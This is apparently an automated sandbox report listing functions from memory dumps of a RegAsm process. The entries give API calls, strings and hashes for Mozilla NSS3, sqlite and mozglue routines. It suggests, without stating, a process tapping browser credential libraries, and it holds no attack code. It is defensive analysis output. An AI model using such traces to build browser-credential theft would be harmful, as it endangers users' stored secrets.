                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                • String ID: %dx%d
                                                                                • API String ID: 3940144428-2206825331
                                                                                • Opcode ID: b8d7bca2d2f12ff90ba38a1e8a59390212395579c896a9438ed413e6516ca11a
                                                                                • Instruction ID: a5561a93a22769e98eddca292aca24bf0ee440d6a8de822d8c1c0f2786625d1a
                                                                                • Opcode Fuzzy Hash: b8d7bca2d2f12ff90ba38a1e8a59390212395579c896a9438ed413e6516ca11a
                                                                                • Instruction Fuzzy Hash: D5F0AD35A01224FBE7106BA1AC0DE9F7E6DFF4ABA1F001029FA0193150D6B5490187B4
                                                                                Function 6C91CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C91CD08
                                                                                • PK11_DoesMechanism.NSS3(?,?), ref: 6C91CE16
                                                                                • PR_SetError.NSS3(00000000,00000000), ref: 6C91D079
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                • String ID:
                                                                                • API String ID: 1351604052-0
                                                                                • Opcode ID: 3736999e3c36fcc2431c19ee98805a41acfdbabe62a3c02905789c16dab91c35
                                                                                • Instruction ID: 400f75559e7ebf728fe1bf75f0ec4ff41b6bb7709ad1aae85fd8205cc2cfff19
                                                                                • Opcode Fuzzy Hash: 3736999e3c36fcc2431c19ee98805a41acfdbabe62a3c02905789c16dab91c35
                                                                                • Instruction Fuzzy Hash: 65C18DB1A042199FDB21CF24CC81BDAB7B8AF58318F1441A8D948A7B41E775EE95CF90
                                                                                Function 6C8D2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ZAlloc_Util.NSS3(DA5D7AA7), ref: 6C8D2C5D
                                                                                  • Part of subcall function 6C930D30: calloc.MOZGLUE ref: 6C930D50
                                                                                  • Part of subcall function 6C930D30: TlsGetValue.KERNEL32 ref: 6C930D6D
                                                                                • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C8D2C8D
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8D2CE0
                                                                                  • Part of subcall function 6C8D2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C8D2CDA,?,00000000), ref: 6C8D2E1E
                                                                                  • Part of subcall function 6C8D2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C8D2E33
                                                                                  • Part of subcall function 6C8D2E00: TlsGetValue.KERNEL32 ref: 6C8D2E4E
                                                                                  • Part of subcall function 6C8D2E00: EnterCriticalSection.KERNEL32(?), ref: 6C8D2E5E
                                                                                  • Part of subcall function 6C8D2E00: PL_HashTableLookup.NSS3(?), ref: 6C8D2E71
                                                                                  • Part of subcall function 6C8D2E00: PL_HashTableRemove.NSS3(?), ref: 6C8D2E84
                                                                                  • Part of subcall function 6C8D2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C8D2E96
                                                                                  • Part of subcall function 6C8D2E00: PR_Unlock.NSS3 ref: 6C8D2EA9
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8D2D23
                                                                                • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C8D2D30
                                                                                • CERT_MakeCANickname.NSS3(00000001), ref: 6C8D2D3F
                                                                                • free.MOZGLUE(00000000), ref: 6C8D2D73
                                                                                • CERT_DestroyCertificate.NSS3(?), ref: 6C8D2DB8
                                                                                • free.MOZGLUE ref: 6C8D2DC8
                                                                                  • Part of subcall function 6C8D3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8D3EC2
                                                                                  • Part of subcall function 6C8D3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C8D3ED6
                                                                                  • Part of subcall function 6C8D3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C8D3EEE
                                                                                  • Part of subcall function 6C8D3E60: PR_CallOnce.NSS3(6CA32AA4,6C9312D0), ref: 6C8D3F02
                                                                                  • Part of subcall function 6C8D3E60: PL_FreeArenaPool.NSS3 ref: 6C8D3F14
                                                                                  • Part of subcall function 6C8D3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C8D3F27
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
                                                                                • String ID:
                                                                                • API String ID: 3941837925-0
                                                                                • Opcode ID: 3966902a35970883b664e4b9224bce33b2a95a8d7cce818a661286a6374ceef9
                                                                                • Instruction ID: cfa4ffa638fe3f218513e6f918514adf4a882f8176fe4713cbec20f5f669424a
                                                                                • Opcode Fuzzy Hash: 3966902a35970883b664e4b9224bce33b2a95a8d7cce818a661286a6374ceef9
                                                                                • Instruction Fuzzy Hash: 5C51EF71A0431A9BEB209F28DE85B6B77E5AF94349F160838E855C3610EB35FC158B92
                                                                                Function 6C7ECC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C7B31A7), ref: 6C7ECDDD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                • API String ID: 4275171209-2186867486
                                                                                • Opcode ID: 14a63df60ba495a4384fe51833bb4c5eda227f58d31a8d64e59d70ad6acbd0ee
                                                                                • Instruction ID: c5f619838a3f7cf9fd9660af687f09bb7ca91c02cfb2ed3cd2f1e75e71b63bb2
                                                                                • Opcode Fuzzy Hash: 14a63df60ba495a4384fe51833bb4c5eda227f58d31a8d64e59d70ad6acbd0ee
                                                                                • Instruction Fuzzy Hash: 2031C5767402155BFF20AEE98E45BAE7F79BB4971AF205424F618AB780DB70D800C7E0
                                                                                Function 6C934DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C93536F,00000022,?,?,00000000,?), ref: 6C934E70
                                                                                • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C934F28
                                                                                • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C934F8E
                                                                                • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C934FAE
                                                                                • free.MOZGLUE(?), ref: 6C934FC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                • String ID: %s=%c%s%c$%s=%s
                                                                                • API String ID: 2709355791-2032576422
                                                                                • Opcode ID: 9945d424a57ad49c649d7e21d1c2a3bcd6790fb2c0efc368bc7669b6c9730542
                                                                                • Instruction ID: 61d93dcf5820ea85371be2110da08083f51fb867400dd32e39e51178ca61bcc2
                                                                                • Opcode Fuzzy Hash: 9945d424a57ad49c649d7e21d1c2a3bcd6790fb2c0efc368bc7669b6c9730542
                                                                                • Instruction Fuzzy Hash: 24512B31A051768BEB11CA6988507FF7FF99F42308F1A9125E89CA7B81D32AC8558FD1
                                                                                Function 6C7BECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C7BF100: LoadLibraryW.KERNEL32(shell32,?,6C82D020), ref: 6C7BF122
                                                                                  • Part of subcall function 6C7BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C7BF132
                                                                                • moz_xmalloc.MOZGLUE(00000012), ref: 6C7BED50
                                                                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7BEDAC
                                                                                • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C7BEDCC
                                                                                • CreateFileW.KERNEL32 ref: 6C7BEE08
                                                                                • free.MOZGLUE(00000000), ref: 6C7BEE27
                                                                                • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C7BEE32
                                                                                  • Part of subcall function 6C7BEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C7BEBB5
                                                                                  • Part of subcall function 6C7BEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C7ED7F3), ref: 6C7BEBC3
                                                                                  • Part of subcall function 6C7BEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C7ED7F3), ref: 6C7BEBD6
                                                                                Strings
                                                                                • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C7BEDC1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                • API String ID: 1980384892-344433685
                                                                                • Opcode ID: b90c58190f6564a183d826457620dcc3b36c42dae99815b7d3de69dc16a05af4
                                                                                • Instruction ID: 1518f206f76e4535bdc5dbd5d506b6b5ee5fc36abe1baa4f54352db1aa119cdc
                                                                                • Opcode Fuzzy Hash: b90c58190f6564a183d826457620dcc3b36c42dae99815b7d3de69dc16a05af4
                                                                                • Instruction Fuzzy Hash: FB51E271D053088BEB10DF68CA496EEB7B4EF59318F04886DE8557B740E774A988C7E2
                                                                                Function 6C90ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C90ACE6
                                                                                • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C90AD14
                                                                                • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C90AD23
                                                                                  • Part of subcall function 6C9ED930: PL_strncpyz.NSS3(?,?,?), ref: 6C9ED963
                                                                                • PR_LogPrint.NSS3(?,00000000), ref: 6C90AD39
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: L_strncpyzPrint$L_strcatn
                                                                                • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                • API String ID: 332880674-3521875567
                                                                                • Opcode ID: b128f59754a222569ccf7a31cea3eaaeed9ba44b707aaf9192329e13afb496f7
                                                                                • Instruction ID: db96f7d2a6e13a59ad37761d42a7569e5841cd667707e57c1b77517aa62658a0
                                                                                • Opcode Fuzzy Hash: b128f59754a222569ccf7a31cea3eaaeed9ba44b707aaf9192329e13afb496f7
                                                                                • Instruction Fuzzy Hash: A92125317002059FDB259F64AD98B6A77B5AF6270DF048429E40DD7A12DF34D84ACBD2
                                                                                Function 6C8E8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(00000000,00000000,?,6C8F124D,00000001), ref: 6C8E8D19
                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,6C8F124D,00000001), ref: 6C8E8D32
                                                                                • PL_ArenaRelease.NSS3(?,?,?,?,?,6C8F124D,00000001), ref: 6C8E8D73
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6C8F124D,00000001), ref: 6C8E8D8C
                                                                                  • Part of subcall function 6C97DD70: TlsGetValue.KERNEL32 ref: 6C97DD8C
                                                                                  • Part of subcall function 6C97DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C97DDB4
                                                                                • PR_Unlock.NSS3(?,?,?,?,?,6C8F124D,00000001), ref: 6C8E8DBA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                • String ID: KRAM$KRAM
                                                                                • API String ID: 2419422920-169145855
                                                                                • Opcode ID: 6b57433eb3f4e750d494b034d49305eba9bc7d68f27dba71fefc51a65a7a6f81
                                                                                • Instruction ID: 764a95cec090600b98b7f449acc9c0b1d79e608b83b48faf844364f1f6cf9200
                                                                                • Opcode Fuzzy Hash: 6b57433eb3f4e750d494b034d49305eba9bc7d68f27dba71fefc51a65a7a6f81
                                                                                • Instruction Fuzzy Hash: C4216BB1A046058FCB14EF3CC6846AEB7F0FF9A319F15896AD89897701E734D852CB91
                                                                                Function 6C9E0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C9E0EE6
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C9E0EFA
                                                                                  • Part of subcall function 6C8CAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C8CAF0E
                                                                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F16
                                                                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F1C
                                                                                • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F25
                                                                                • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9E0F2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                • API String ID: 2948422844-1374795319
                                                                                • Opcode ID: 20e19d202c75cdde251f1ad2b36531628ac0bfd560782ca646d1e69bda8a020b
                                                                                • Instruction ID: 7e838c9773e6a09a346d3f6826f6bf0a7700a3b2332e7baf6e0a7063335c840e
                                                                                • Opcode Fuzzy Hash: 20e19d202c75cdde251f1ad2b36531628ac0bfd560782ca646d1e69bda8a020b
                                                                                • Instruction Fuzzy Hash: FA01D2B5900214BBDF01AFA8DC45CAB3F3CEF46368F044424FD0987701D635EA6097A2
                                                                                Function 6C7F9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6C7EAB89: EnterCriticalSection.KERNEL32(6C83E370,?,?,?,6C7B34DE,6C83F6CC,?,?,?,?,?,?,?,6C7B3284), ref: 6C7EAB94
                                                                                  • Part of subcall function 6C7EAB89: LeaveCriticalSection.KERNEL32(6C83E370,?,6C7B34DE,6C83F6CC,?,?,?,?,?,?,?,6C7B3284,?,?,6C7D56F6), ref: 6C7EABD1
                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C7C4A68), ref: 6C7F945E
                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C7F9470
                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C7F9482
                                                                                • __Init_thread_footer.LIBCMT ref: 6C7F949F
                                                                                Strings
                                                                                • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C7F947D
                                                                                • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C7F9459
                                                                                • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C7F946B
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                • API String ID: 4042361484-1628757462
                                                                                • Opcode ID: f631590c756116b26a6ea9a455d97232c877d7af95da0ea312d329812b34915d
                                                                                • Instruction ID: 1bbe9eeeb05464e1ba957bca356e88d302cc95c6c1339e5b3d2cae92c03ab738
                                                                                • Opcode Fuzzy Hash: f631590c756116b26a6ea9a455d97232c877d7af95da0ea312d329812b34915d
                                                                                • Instruction Fuzzy Hash: 9A012830A0011097D7309FDCDB98A5733B49B2632CF042D36D86E86B41D725D856C9DB
                                                                                Function 6C9A4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9A4DC3
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9A4DE0
                                                                                Strings
                                                                                • %s at line %d of [%.10s], xrefs: 6C9A4DDA
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9A4DCB
                                                                                • invalid, xrefs: 6C9A4DB8
                                                                                • misuse, xrefs: 6C9A4DD5
                                                                                • API call with %s database connection pointer, xrefs: 6C9A4DBD
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                • API String ID: 632333372-2974027950
                                                                                • Opcode ID: bc593b005046e660d543983a8179fffe2a6b3d6901b7b4fbe858137e5b2c7c07
                                                                                • Instruction ID: a2c3f5444122a725971e4d9bd4bc1fd4f5fd8d6fbdb4b974b2becb1e252410b3
                                                                                • Opcode Fuzzy Hash: bc593b005046e660d543983a8179fffe2a6b3d6901b7b4fbe858137e5b2c7c07
                                                                                • Instruction Fuzzy Hash: 1DF05911F056343FDB004094DC14F823BAD6F0136CF1629B0ED08BBE93EA06F89186E0
                                                                                Function 6C9A4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9A4E30
                                                                                • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9A4E4D
                                                                                Strings
                                                                                • %s at line %d of [%.10s], xrefs: 6C9A4E47
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9A4E38
                                                                                • invalid, xrefs: 6C9A4E25
                                                                                • misuse, xrefs: 6C9A4E42
                                                                                • API call with %s database connection pointer, xrefs: 6C9A4E2A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
